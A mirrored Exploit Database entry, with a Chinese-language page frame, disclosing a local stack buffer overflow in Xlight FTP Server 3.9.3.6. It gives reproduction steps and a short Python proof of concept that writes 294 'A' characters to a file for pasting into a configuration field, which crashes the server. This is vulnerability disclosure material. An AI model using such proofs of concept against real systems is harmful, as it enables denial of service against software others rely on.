Xlight FTP Server 3.9.3.6 – ‘Stack Buffer Overflow’ (DOS)

• Exploit Database
• 146 阅读

• 作者： Yehia Elghaly
  日期： 2023-08-04
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51665/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS) # Discovered by: Yehia Elghaly # Discovered Date: 2023-08-04 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link : https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.6 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP Professional SP3 - Windows 11 x64   # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)   # Steps to reproduce: # 1. - Download and Xlight FTP Server # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP Server 3.9.3.6 # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in-Paste the characters # 7- Crashed   #!/usr/bin/env python3   exploit = 'A' * 294   try: with open("exploit.txt","w") as file: file.write(exploit) print("POC is created") except: print("POC not created")